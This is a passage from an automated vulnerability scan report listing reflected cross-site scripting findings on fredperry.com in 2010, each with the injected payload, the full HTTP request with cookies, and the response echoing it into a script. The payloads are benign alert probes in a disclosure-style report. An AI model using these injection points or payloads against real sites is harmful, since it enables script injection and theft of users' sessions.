Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=31u97j9kf5mgjd7o8iqk5h5f92; expires=Tue, 09-Nov-2010 17:18:00 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercareba55f"-alert(1)-"94d3f8d094a/ordertracking/");
//]]>
...[SNIP]...

1.53. http://www.fredperry.com/customercare/ordertracking/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e908c"-alert(1)-"ff1f4769767 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:18:24 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=tqjjko9svnmmijvl6ki4ckt6l4; expires=Tue, 09-Nov-2010 17:18:24 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29362

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/ordertrackinge908c"-alert(1)-"ff1f4769767/");
//]]>
...[SNIP]...

1.54. http://www.fredperry.com/customercare/ordertracking/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/ordertracking/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab65d"-alert(1)-"b8038686cc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:17:18 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=3nvha52q3f1fd5147u49c3m3i1; expires=Tue, 09-Nov-2010 17:17:18 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31974

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Order T
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/ordertracking/?ab65d"-alert(1)-"b8038686cc=1");
//]]>
...[SNIP]...

1.55. http://www.fredperry.com/customercare/returns/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 949c8"-alert(1)-"04627fbb78f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare949c8"-alert(1)-"04627fbb78f/returns/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:28 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vhqebjmfv1o1birdugll8iu0h4; expires=Tue, 09-Nov-2010 17:19:28 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare949c8"-alert(1)-"04627fbb78f/returns/");
//]]>
...[SNIP]...

1.56. http://www.fredperry.com/customercare/returns/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91a56"-alert(1)-"c8df448cb36 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/returns91a56"-alert(1)-"c8df448cb36/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:19:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=uj4chm4hhumhmvvm1k7503vl73; expires=Tue, 09-Nov-2010 17:19:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29356

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/returns91a56"-alert(1)-"c8df448cb36/");
//]]>
...[SNIP]...

1.57. http://www.fredperry.com/customercare/returns/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /customercare/returns/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4ff83"-alert(1)-"be4f89bb799 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:18:29 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=pivkvr5qittpcl1jhb08msmhs2; expires=Tue, 09-Nov-2010 17:18:30 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 33970

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Returns
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/customercare/returns/?4ff83"-alert(1)-"be4f89bb799=1");
//]]>
...[SNIP]...

1.58. http://www.fredperry.com/footwear/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8cffc"-alert(1)-"62f4b0a691c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear8cffc"-alert(1)-"62f4b0a691c/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:21 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=er03stn5g3auh22ne9eev5a085; expires=Tue, 09-Nov-2010 17:03:21 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29344

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear8cffc"-alert(1)-"62f4b0a691c/");
//]]>
...[SNIP]...

1.59. http://www.fredperry.com/footwear/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bfbdc"-alert(1)-"ce09f5b9080 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/?bfbdc"-alert(1)-"ce09f5b9080=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:52 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=1fvvphdfq79bvvkmf81jq6p373; expires=Tue, 09-Nov-2010 17:01:52 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> footwea
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/?bfbdc"-alert(1)-"ce09f5b9080=1");
//]]>
...[SNIP]...

1.60. http://www.fredperry.com/footwear/men/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 18143"-alert(1)-"e6c8aea808b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear18143"-alert(1)-"e6c8aea808b/men/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=huq0q65u4sj1fui2uj3fk73st0; expires=Tue, 09-Nov-2010 17:03:08 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear18143"-alert(1)-"e6c8aea808b/men/");
//]]>
...[SNIP]...

1.61. http://www.fredperry.com/footwear/men/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5f12a"-alert(1)-"42752903dcc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/men5f12a"-alert(1)-"42752903dcc/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:23 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=334i604v3jd1ug35amqrq6l7u1; expires=Tue, 09-Nov-2010 17:03:23 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29348

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/men5f12a"-alert(1)-"42752903dcc/");
//]]>
...[SNIP]...

1.62. http://www.fredperry.com/footwear/men/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/men/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9db67"-alert(1)-"5e26043ec8f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/men/?9db67"-alert(1)-"5e26043ec8f=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:50 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=vuvttoa5vopkerom16e92pksb7; expires=Tue, 09-Nov-2010 17:01:50 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 47790

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Men's F
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/men/?9db67"-alert(1)-"5e26043ec8f=1");
//]]>
...[SNIP]...

1.63. http://www.fredperry.com/footwear/women/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2be5b"-alert(1)-"e5744c4501f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear2be5b"-alert(1)-"e5744c4501f/women/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:25 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=96c2h4h8g79gg428a0hbandns1; expires=Tue, 09-Nov-2010 17:03:25 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear2be5b"-alert(1)-"e5744c4501f/women/");
//]]>
...[SNIP]...

1.64. http://www.fredperry.com/footwear/women/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cd108"-alert(1)-"bc1e04530ca was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/womencd108"-alert(1)-"bc1e04530ca/ HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 404 Not Found
Date: Tue, 09 Nov 2010 16:03:42 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=15409u7iamhegudvk9knvhonk7; expires=Tue, 09-Nov-2010 17:03:42 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Status: 404 File not found
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 29350

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> 404 Not
...[SNIP]...
<![CDATA[
var pageTracker = _gat._getTracker("UA-10227276-1");
pageTracker._trackPageview("/footwear/womencd108"-alert(1)-"bc1e04530ca/");
//]]>
...[SNIP]...

1.65. http://www.fredperry.com/footwear/women/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.fredperry.com
Path:   /footwear/women/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e0969"-alert(1)-"29b7f4c9995 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /footwear/women/?e0969"-alert(1)-"29b7f4c9995=1 HTTP/1.1
Host: www.fredperry.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=119066206.1289339096.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ARPT=VVNKIYS192.168.100.195CKOLQ; __utma=119066206.1815755339.1289339096.1289339096.1289339096.1; __utmc=119066206; magento=u63lw0gvkztmuuz5kfxyl5pe0qoemz13; __utmb=119066206.1.10.1289339096;

Response

HTTP/1.1 200 OK
Date: Tue, 09 Nov 2010 16:01:46 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.14
Set-Cookie: frontend=c9jgs8fku50oedu974bmbvk176; expires=Tue, 09-Nov-2010 17:01:46 GMT; path=/; domain=www.fredperry.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42146

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title> Women's
...[SNIP]...
<![CDATA[
